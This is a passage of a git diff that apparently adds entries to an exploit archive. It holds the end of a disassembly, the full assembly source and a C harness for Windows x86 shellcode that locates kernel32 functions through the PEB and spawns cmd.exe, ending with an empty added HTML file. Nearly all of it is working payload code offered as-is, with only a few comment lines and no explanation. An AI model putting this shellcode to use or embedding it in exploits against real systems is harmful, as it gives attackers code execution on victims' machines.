+ 41: 75 e2 jne 25
+ 43: 8b 73 1c mov 0x1c(%ebx),%esi
+ 46: 01 ce add %ecx,%esi
+ 48: 8b 14 96 mov (%esi,%edx,4),%edx
+ 4b: 01 ca add %ecx,%edx
+ 4d: 89 d6 mov %edx,%esi
+ 4f: 89 cf mov %ecx,%edi
+ 51: 31 db xor %ebx,%ebx
+ 53: 68 79 41 41 41 push $0x41414179
+ 58: 66 89 5c 24 01 mov %bx,0x1(%esp)
+ 5d: 68 65 6d 6f 72 push $0x726f6d65
+ 62: 68 65 72 6f 4d push $0x4d6f7265
+ 67: 68 52 74 6c 5a push $0x5a6c7452
+ 6c: 54 push %esp
+ 6d: 51 push %ecx
+ 6e: ff d2 call *%edx
+ 70: 83 c4 10 add $0x10,%esp
+ 73: 31 c9 xor %ecx,%ecx
+ 75: 89 ca mov %ecx,%edx
+ 77: b2 54 mov $0x54,%dl
+ 79: 51 push %ecx
+ 7a: 83 ec 54 sub $0x54,%esp
+ 7d: 8d 0c 24 lea (%esp),%ecx
+ 80: 51 push %ecx
+ 81: 52 push %edx
+ 82: 51 push %ecx
+ 83: ff d0 call *%eax
+ 85: 59 pop %ecx
+ 86: 31 d2 xor %edx,%edx
+ 88: 68 73 41 42 42 push $0x42424173
+ 8d: 66 89 54 24 02 mov %dx,0x2(%esp)
+ 92: 68 6f 63 65 73 push $0x7365636f
+ 97: 68 74 65 50 72 push $0x72506574
+ 9c: 68 43 72 65 61 push $0x61657243
+ a1: 8d 14 24 lea (%esp),%edx
+ a4: 51 push %ecx
+ a5: 52 push %edx
+ a6: 57 push %edi
+ a7: ff d6 call *%esi
+ a9: 59 pop %ecx
+ aa: 83 c4 10 add $0x10,%esp
+ ad: 31 db xor %ebx,%ebx
+ af: 68 65 78 65 41 push $0x41657865
+ b4: 88 5c 24 03 mov %bl,0x3(%esp)
+ b8: 68 63 6d 64 2e push $0x2e646d63
+ bd: 8d 1c 24 lea (%esp),%ebx
+ c0: 31 d2 xor %edx,%edx
+ c2: b2 44 mov $0x44,%dl
+ c4: 89 11 mov %edx,(%ecx)
+ c6: 8d 51 44 lea 0x44(%ecx),%edx
+ c9: 56 push %esi
+ ca: 31 f6 xor %esi,%esi
+ cc: 52 push %edx
+ cd: 51 push %ecx
+ ce: 56 push %esi
+ cf: 56 push %esi
+ d0: 56 push %esi
+ d1: 56 push %esi
+ d2: 56 push %esi
+ d3: 56 push %esi
+ d4: 53 push %ebx
+ d5: 56 push %esi
+ d6: ff d0 call *%eax
+ d8: 5e pop %esi
+ d9: 83 c4 08 add $0x8,%esp
+ dc: 31 db xor %ebx,%ebx
+ de: 68 65 73 73 41 push $0x41737365
+ e3: 88 5c 24 03 mov %bl,0x3(%esp)
+ e7: 68 50 72 6f 63 push $0x636f7250
+ ec: 68 45 78 69 74 push $0x74697845
+ f1: 8d 1c 24 lea (%esp),%ebx
+ f4: 53 push %ebx
+ f5: 57 push %edi
+ f6: ff d6 call *%esi
+ f8: 31 c9 xor %ecx,%ecx
+ fa: 51 push %ecx
+ fb: ff d0 call *%eax
+*/
+
+
+/*
+section .text
+ global _start
+_start:
+
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB->ldr
+mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov ecx,[eax+0x10] ;kernel32 base address
+
+
+xor ebx,ebx
+mov ebx,[ecx+0x3c] ;DOS->elf_anew
+add ebx,ecx ;PE HEADER
+mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
+add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
+
+mov esi,[ebx+0x20] ;AddressOfNames
+add esi,ecx
+
+
+;---------------------------------------------
+
+xor edx,edx
+
+func:
+inc edx
+lodsd
+add eax,ecx
+cmp dword [eax],'GetP'
+jnz func
+cmp dword [eax+4],'rocA'
+jnz func
+cmp dword [eax+8],'ddre'
+jnz func
+
+
+;--------------------------------
+
+
+mov esi,[ebx+0x1c] ;AddressOfFunctions
+add esi,ecx
+
+mov edx,[esi+edx*4]
+add edx,ecx ;GetProcAddress()
+
+;-------------------------------------
+
+mov esi,edx
+mov edi,ecx
+
+;-------------------------
+
+
+xor ebx,ebx
+
+
+;finding address of RtlZeroMemory()
+
+push 0x41414179
+mov [esp+1],word bx
+push 0x726f6d65
+push 0x4d6f7265
+push 0x5a6c7452
+
+
+
+push esp
+push ecx
+
+call edx
+
+;------------------------------
+add esp,16
+;-----------------------------------
+
+
+;zero out 84 bytes
+
+
+xor ecx,ecx
+mov edx,ecx
+
+mov dl,84
+
+push ecx
+
+sub esp,84
+
+lea ecx,[esp]
+
+push ecx
+
+push edx
+push ecx
+
+call eax
+
+
+;----------------------------
+
+;finding address of CreateProcessA()
+pop ecx
+
+xor edx,edx
+
+push 0x42424173
+mov [esp+2],word dx
+push 0x7365636f
+push 0x72506574
+push 0x61657243
+
+lea edx,[esp]
+
+push ecx
+
+push edx
+push edi
+
+call esi
+
+
+;--------------------------------
+;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
+
+pop ecx
+
+add esp,16
+
+xor ebx,ebx
+push 0x41657865
+mov [esp+3],byte bl
+push 0x2e646d63
+
+lea ebx,[esp]
+
+
+xor edx,edx
+mov dl,68
+
+mov [ecx],edx
+
+lea edx,[ecx+68]
+
+
+push esi ;
+
+xor esi,esi
+
+
+push edx
+push ecx
+
+push esi
+push esi
+push esi
+push esi
+push esi
+push esi
+
+push ebx
+push esi
+
+call eax
+
+pop esi
+
+;-------------------------------------
+;finding address of ExitProcess()
+
+add esp,8
+
+xor ebx,ebx
+
+push 0x41737365
+mov [esp+3],byte bl
+push 0x636f7250
+push 0x74697845
+
+
+lea ebx,[esp]
+
+
+push ebx
+push edi
+
+call esi
+
+xor ecx,ecx
+push ecx
+call eax
+*/
+
+
+#include
+#include
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";
+
+main()
+{
+printf("shellcode lenght %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}
diff --git a/platforms/windows/dos/40253.html b/platforms/windows/dos/40253.html
new file mode 100755
index 000000000..437a03116
--- /dev/null
+++ b/platforms/windows/dos/40253.html
@@ -0,0 +1,21 @@
+
+
+
+
+
+